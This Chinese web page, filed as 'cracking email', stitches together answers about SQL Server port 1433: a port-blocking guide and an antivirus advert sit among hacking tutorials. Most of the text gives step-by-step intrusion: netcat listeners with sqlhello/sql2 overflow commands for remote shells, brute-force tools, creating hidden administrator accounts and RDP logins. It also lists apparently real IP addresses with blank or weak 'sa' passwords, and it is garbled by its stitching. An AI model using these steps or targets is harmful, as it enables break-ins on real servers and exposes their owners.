作者:hacker发布时间:2022-09-08分类:破解邮箱浏览:147评论:1
不用理就行了。有这个提示说明已经被拦截了。发起攻击的电脑一般是安装了sql并且没有打补丁的电脑感染了蠕虫病毒。是蠕虫病毒自动发起的攻击。这种蠕虫病毒的攻击在2004年的时候非常常见。那个时候人们的安全意识非常淡薄。安装了sql之后也不知道打补丁。蠕虫病毒经常利用这个漏洞(攻击1433端口)传播。也有人为的利用这个漏洞的。那个时候我就经常利用一款名为sqlhello2的软件反攻击感染了这种蠕虫病毒的电脑。
当然也不排除有人利用扫描软件扫描你的电脑1433端口,进行sa口令试探。现在这种攻击几乎不见了。你不理它也行,或者去网上找到我说的那款软件攻击一下这种电脑也行。就算你电脑安装了sql,如果打了补丁而且也没什么弱口令的话,也不用担心这种攻击。
您好
您可以到腾讯电脑管家官网下载一个电脑管家
电脑管家是查杀防护2合1的专业杀毒软件,除了拥有4+1专业杀毒引擎外,还拥有16层实时防护功能和一系列的辅助功能
您平时使用电脑的时候,同步开启电脑管家,就可以受到电脑管家的防护,从上网安全、应用入口、系统底层等全方位保护电脑安全,不受木马病毒侵袭。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
腾讯电脑管家企业平台:
SQL服务器在公网上,使用1433端口.
小心病毒,小心你的1433端口!
SQL Server使用的1433端口,往往容易被病毒侵袭,造成不可估量的损失!以下这篇文章就是教你如何封闭自己win 2k/xp上不使用的端口的,不用SQL server/client 的朋友最好遵照这个方法试一试封掉1433端口。
封锁端口,全面构建防线
黑客大多通过端口进行入侵,所以你的服务器只能开放你需要的端口,那么你需要哪些端口呢?以下是常用端口,你可根据需要取舍:
80为Web网站服务;21为FTP服务;25 为E-mail SMTP服务;110为Email POP3服务。
其他还有SQL Server的端口1433等,你可到网上查找相关资料。那些不用的端口一定要关闭!关闭这些端口,我们可以通过Windows 2000的安全策略进行。借助它的安全策略,完全可以阻止入侵者的攻击。你可以通过“管理工具→本地安全策略”进入,右击“IP安全策略”,选择“创建 IP安全策略”,点[下一步]。输入安全策略的名称,点[下一步],一直到完成,你就创建了一个安全策略:
接着你要做的是右击“IP安全策略”,进入管理IP筛选器和筛选器操作,在管理IP筛选器列表中,你可以添加要封锁的端口,这里以关闭ICMP和139端口为例说明。
关闭了ICMP,黑客软件如果没有强制扫描功能就不能扫描到你的机器,也Ping不到你的机器。关闭ICMP的具体操作如下:点[添加],然后在名称中输入“关闭ICMP”,点右边的[添加],再点[下一步]。在源地址中选“任何IP地址”,点[下一步]。在目标地址中选择“我的IP地址”,点 [下一步]。在协议中选择“ICMP”,点[下一步]。回到关闭ICMP属性窗口,即关闭了ICMP。
下面我们再设置关闭139,同样在管理IP筛选器列表中点“添加”,名称设置为“关闭139”,点右边的“添加”,点[下一步]。在源地址中选择“任何IP地址”,点[下一步]。在目标地址中选择“我的IP地址”,点[下一步]。在协议中选择“TCP”,点[下一步]。在设置IP协议端口中选择从任意端口到此端口,在此端口中输入139,点[下一步]。即完成关闭139端口,其他的端口也同样设置,结果如图:
特别指出的是关闭UDP4000可以禁止校园网中的机器使用QQ。然后进入设置管理筛选器操作,点“添加”,点[下一步],在名称中输入“拒绝”,点[下一步]。选择“阻止”,点[下一步]。
然后关闭该属性页,右击新建的IP安全策略“安全”,打开属性页。在规则中选择“添加”,点[下一步]。选择“此规则不指定隧道”,点[下一步]。在选择网络类型中选择“所有网络连接”,点[下一步]。在IP筛选器列表中选择“关闭ICMP”,点[下一步]。在筛选器操作中选择“拒绝”,点 [下一步]。这样你就将“关闭ICMP”的筛选器加入到名为“安全”的IP安全策略中。同样的方法,你可以将“关闭139”等其他筛选器加入进来。
最后要做的是指派该策略,只有指派后,它才起作用。方法是右击“安全”,在菜单中选择“所有任务”,选择“指派”。IP安全设置到此结束,你可根据自己的情况,设置相应的策略。
设置完成后,你可再用X-Scan进行检查,发现问题再补上。
通过以上的设置,你的Windows 2000服务器可以说是非常安全了。希望你早日筑起服务器的安全防护。
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
久违的溢出工具
用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?
先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。
218.5.135.66 SQL-Server弱口令: "sa/1234"
218.14.115.111 SQL-Server弱口令: "sa/[空口令]"
218.12.38.52 SQL-Server弱口令: "sa/[空口令]"
218.12.97.14 SQL-Server弱口令: "sa/[空口令]"
218.6.242.228 SQL-Server弱口令: "sa/[空口令]"
222.100.119.3 SQL-Server弱口令: "sa/[空口令]"
222.105.67.200 SQL-Server弱口令: "sa/[空口令]"
222.105.28.130 SQL-Server弱口令: "sa/[空口令]"
222.106.60.51 SQL-Server弱口令: "sa/[空口令]"
222.117.107.1 SQL-Server弱口令: "sa/[空口令]"
在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具nc.exe和sql2.exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了饿。这里我们只用2000不说98。如果你把你的下的nc.exe和sql2.exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:>sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\system32>.就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。
呵呵,基本就是这样了,,,,
参考资料:
希望我回答对你有所帮助
1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。
标签:1433端口攻击软件
已有1位网友发表了看法:
访客 评论于 2022-09-08 12:07:31 回复
开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:>sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是